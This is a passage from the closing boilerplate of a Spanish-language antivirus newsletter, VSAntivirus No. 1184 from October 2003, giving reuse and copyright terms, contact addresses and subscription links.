página). Si usted desea usar esta información en cualquier
medio escrito o electrónico, puede hacerlo sin solicitarnos
el permiso respectivo, con la única condición de mencionar su
origen, y remitirnos un e-mail o ejemplar con la ubicación
donde se haga referencia al material usado que haya sido
sacado de este boletín o de la página de VSAntivirus.
Video Soft, Video Soft BBS, VSAntivirus y VSAyuda son marcas
registradas.
Los artículos de otros autores han sido incluidos de acuerdo
a la política de Copyright adoptada por cada uno de ellos, y
su inclusión en nuestro boletín se rige por dichas políticas,
sin embargo, para su uso en otro medio, se deberá solicitar
la debida autorización.-
_____________________________________________________________
Visite diariamente nuestra página. Puede bajar de allí las
versiones de evaluación actualizadas de los antivirus más
usados o que consideramos por nuestra experiencia más
confiables. El criterio de selección solo pasa por nuestra
experiencia diaria con usuarios y clientes, a los que
asesoramos y damos servicio técnico.
_____________________________________________________________
Cualquier duda o comentario sobre esta lista de correo, envíe
un e-mail a cualquiera de estas direcciones:
jllopez@nativo.com
videosoft@videosoft.net.uy
_____________________________________________________________
VSANTIVIRUS - Sitio oficial: http://www.vsantivirus.com
_____________________________________________________________
Altas: http://listas.vsantivirus.com/lista/vsantivirus/alta
Bajas: http://listas.vsantivirus.com/lista/vsantivirus/baja
También puede enviar un mensaje vacío a estas direcciones:
Altas: vsantivirus-alta@listas.vsantivirus.com
Bajas: vsantivirus-baja@listas.vsantivirus.com
_____________________________________________________________
VSANTIVIRUS - http://www.vsantivirus.com - Es un servicio de
VIDEO SOFT (Maldonado, Uruguay) - http://www.videosoft.net.uy
_____________________________________________________________
VSantivirus No. 1184 Año 7, Sábado 4 de octubre de 2003
|
Responder a este mensaje
